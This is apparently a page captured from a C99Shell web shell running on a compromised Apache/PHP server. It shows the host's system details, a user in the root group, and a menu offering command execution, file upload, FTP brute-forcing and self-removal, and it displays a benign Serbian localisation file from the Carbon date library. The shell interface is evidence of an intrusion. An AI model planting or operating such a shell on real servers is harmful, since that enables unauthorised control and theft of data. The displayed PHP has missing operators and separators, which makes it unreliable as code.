!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/nesbot/carbon/src/Carbon/Lang/   drwxr-xr-x
Free 28.45 GB of 117.98 GB (24.11%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     sh.php (2.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of the Carbon package.
 *
 * (c) Brian Nesbitt <brian@nesbot.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

// @codeCoverageIgnoreStart
use Symfony\Component\Translation\PluralizationRules;

if (
class_exists('Symfony\\Component\\Translation\\PluralizationRules')) {
    
PluralizationRules::set(static function ($number) {
        return ((
$number 10 == 1) && ($number 100 != 11)) ? : ((($number 10 >= 2) && ($number 10 <= 4) && (($number 100 10) || ($number 100 >= 20))) ? 2);
    }, 
'sh');
}
// @codeCoverageIgnoreEnd

/*
 * Authors:
 * - Томица Кораћ
 * - Enrique Vidal
 * - Christopher Dell
 * - dmilisic
 * - danijel
 * - Miroslav Matkovic (mikki021)
 */
return [
    
'diff_now' => 'sada',
    
'diff_yesterday' => 'juče',
    
'diff_tomorrow' => 'sutra',
    
'formats' => [
        
'LT' => 'HH:mm',
        
'LTS' => 'HH:mm:ss',
        
'L' => 'DD/MM/YYYY',
        
'LL' => 'MMMM D, YYYY',
        
'LLL' => 'DD MMM HH:mm',
        
'LLLL' => 'MMMM DD, YYYY HH:mm',
    ],
    
'year' => ':count godina|:count godine|:count godina',
    
'y' => ':count g.',
    
'month' => ':count mesec|:count meseca|:count meseci',
    
'm' => ':count m.',
    
'week' => ':count nedelja|:count nedelje|:count nedelja',
    
'w' => ':count n.',
    
'day' => ':count dan|:count dana|:count dana',
    
'd' => ':count d.',
    
'hour' => ':count sat|:count sata|:count sati',
    
'h' => ':count č.',
    
'minute' => ':count minut|:count minuta|:count minuta',
    
'min' => ':count min.',
    
'second' => ':count sekund|:count sekunde|:count sekundi',
    
's' => ':count s.',
    
'ago' => 'pre :time',
    
'from_now' => 'za :time',
    
'after' => 'nakon :time',
    
'before' => ':time raniјe',
    
'weekdays' => ['Nedelja''Ponedeljak''Utorak''Sreda''Četvrtak''Petak''Subota'],
    
'weekdays_short' => ['Ned''Pon''Uto''Sre''Čet''Pet''Sub'],
    
'weekdays_min' => ['Ned''Pon''Uto''Sre''Čet''Pet''Sub'],
    
'months' => ['Januar''Februar''Mart''April''Maj''Jun''Jul''Avgust''Septembar''Oktobar''Novembar''Decembar'],
    
'months_short' => ['Jan''Feb''Mar''Apr''Maj''Jun''Jul''Avg''Sep''Okt''Nov''Dec'],
    
'list' => [', '' i '],
    
'meridiem' => ['pre podne''po podne'],
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--